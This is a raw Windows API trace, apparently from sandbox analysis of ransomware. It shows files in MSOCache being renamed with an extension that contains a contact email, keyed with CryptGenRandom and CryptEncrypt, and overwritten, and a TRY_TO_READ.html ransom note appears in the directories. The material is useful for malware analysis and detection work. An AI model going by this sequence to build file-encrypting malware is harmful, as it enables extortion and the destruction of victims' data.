	[0076.943] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0076.943] ReadFile (in: hFile=0x47c, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x2ab000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x2ab000, lpOverlapped=0x0) returned 1
	[0077.105] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0077.105] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0077.105] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", dwFileAttributes=0x80) returned 1
	[0077.106] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 75
	[0077.106] GetProcessHeap () returned 0x540000
	[0077.106] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0077.106] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab"
	[0077.106] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0077.106] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0077.108] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c
	[0077.108] GetProcessHeap () returned 0x540000
	[0077.108] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0077.108] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=50823389) returned 1
	[0077.108] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x30780dd
	[0077.109] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0077.109] GetProcessHeap () returned 0x540000
	[0077.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0077.109] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0077.109] WriteFile (in: hFile=0x47c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0077.111] WriteFile (in: hFile=0x47c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0077.111] WriteFile (in: hFile=0x47c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0077.111] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30780dd) returned 0x3a20020
	[0077.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30780dd) returned 0x6aa0020
	[0077.115] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0077.115] ReadFile (in: hFile=0x47c, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x30780dd, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x30780dd, lpOverlapped=0x0) returned 1
	[0080.396] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0080.396] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0080.396] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0080.397] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0080.397] GetProcessHeap () returned 0x540000
	[0080.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db570
	[0080.397] lstrcpyW (in: lpString1=0x5db570, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0080.397] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0080.397] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0080.400] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c
	[0080.400] GetProcessHeap () returned 0x540000
	[0080.400] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db570 | out: hHeap=0x540000) returned 1
	[0080.400] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=6241) returned 1
	[0080.400] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1861
	[0080.400] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0080.400] GetProcessHeap () returned 0x540000
	[0080.400] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0080.400] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0080.400] WriteFile (in: hFile=0x47c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0080.402] WriteFile (in: hFile=0x47c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0080.402] WriteFile (in: hFile=0x47c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0080.402] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1861) returned 0x5db570
	[0080.402] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1861) returned 0x5dcde0
	[0080.402] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0080.402] ReadFile (in: hFile=0x47c, lpBuffer=0x5db570, nNumberOfBytesToRead=0x1861, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db570*, lpNumberOfBytesRead=0x3a1f778*=0x1861, lpOverlapped=0x0) returned 1
	[0080.403] SetFilePointer (in: hFile=0x47c, lDistanceToMove=-6241, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0080.403] WriteFile (in: hFile=0x47c, lpBuffer=0x5dcde0*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dcde0*, lpNumberOfBytesWritten=0x3a1f778*=0x1861, lpOverlapped=0x0) returned 1
	[0080.403] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db570 | out: hHeap=0x540000) returned 1
	[0080.403] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dcde0 | out: hHeap=0x540000) returned 1
	[0080.403] CloseHandle (hObject=0x47c) returned 1
	[0080.404] GetProcessHeap () returned 0x540000
	[0080.404] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0080.404] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0080.404] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0080.404] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4c8 | out: hHeap=0x540000) returned 1
	[0080.404] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db420 | out: hHeap=0x540000) returned 1
	[0080.404] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x5db1a0
	[0080.404] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db388 | out: hHeap=0x540000) returned 1
	[0080.404] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5892b0 | out: hHeap=0x540000) returned 1
	[0080.404] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5760 | out: hHeap=0x540000) returned 1
	[0080.404] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da270
	[0080.405] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0080.405] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0080.405] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0080.405] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0080.405] GetLastError () returned 0x0
	[0080.405] FindNextFileW (in: hFindFile=0x5da270, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0080.406] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0080.406] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0080.406] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0080.406] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0080.406] GetLastError () returned 0x0
	[0080.406] FindNextFileW (in: hFindFile=0x5da270, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1
	[0080.407] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0080.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0080.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0080.407] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0080.407] GetLastError () returned 0x0
	[0080.407] FindNextFileW (in: hFindFile=0x5da270, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1
	[0080.407] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0080.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0080.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0080.407] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0080.407] GetLastError () returned 0x0
	[0080.407] FindNextFileW (in: hFindFile=0x5da270, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1
	[0080.407] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0080.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0080.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0080.407] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0080.407] GetLastError () returned 0x0
	[0080.407] FindNextFileW (in: hFindFile=0x5da270, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0080.407] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0080.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0080.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0080.407] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0080.407] GetLastError () returned 0x0
	[0080.407] FindNextFileW (in: hFindFile=0x5da270, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9ec5930, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0080.407] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0080.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0080.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0080.407] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0080.407] GetLastError () returned 0x0
	[0080.407] FindNextFileW (in: hFindFile=0x5da270, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9ec5930, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0080.408] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fb628
	[0080.408] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0080.408] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0080.408] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0080.408] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0080.408] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0080.409] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0080.409] GetProcessHeap () returned 0x540000
	[0080.409] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5fb6d0
	[0080.409] lstrcpyW (in: lpString1=0x5fb6d0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0080.409] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0080.409] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0080.411] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480
	[0080.411] GetProcessHeap () returned 0x540000
	[0080.411] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb6d0 | out: hHeap=0x540000) returned 1
	[0080.411] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1988) returned 1
	[0080.411] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x7c4
	[0080.412] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0080.412] GetProcessHeap () returned 0x540000
	[0080.412] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0080.412] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0080.412] WriteFile (in: hFile=0x480, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0080.414] WriteFile (in: hFile=0x480, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0080.414] WriteFile (in: hFile=0x480, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0080.414] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7c4) returned 0x5fb6d0
	[0080.414] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7c4) returned 0x5fbea0
	[0080.414] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0080.414] ReadFile (in: hFile=0x480, lpBuffer=0x5fb6d0, nNumberOfBytesToRead=0x7c4, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb6d0*, lpNumberOfBytesRead=0x3a1f778*=0x7c4, lpOverlapped=0x0) returned 1
	[0080.414] SetFilePointer (in: hFile=0x480, lDistanceToMove=-1988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0080.414] WriteFile (in: hFile=0x480, lpBuffer=0x5fbea0*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fbea0*, lpNumberOfBytesWritten=0x3a1f778*=0x7c4, lpOverlapped=0x0) returned 1
	[0080.414] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb6d0 | out: hHeap=0x540000) returned 1
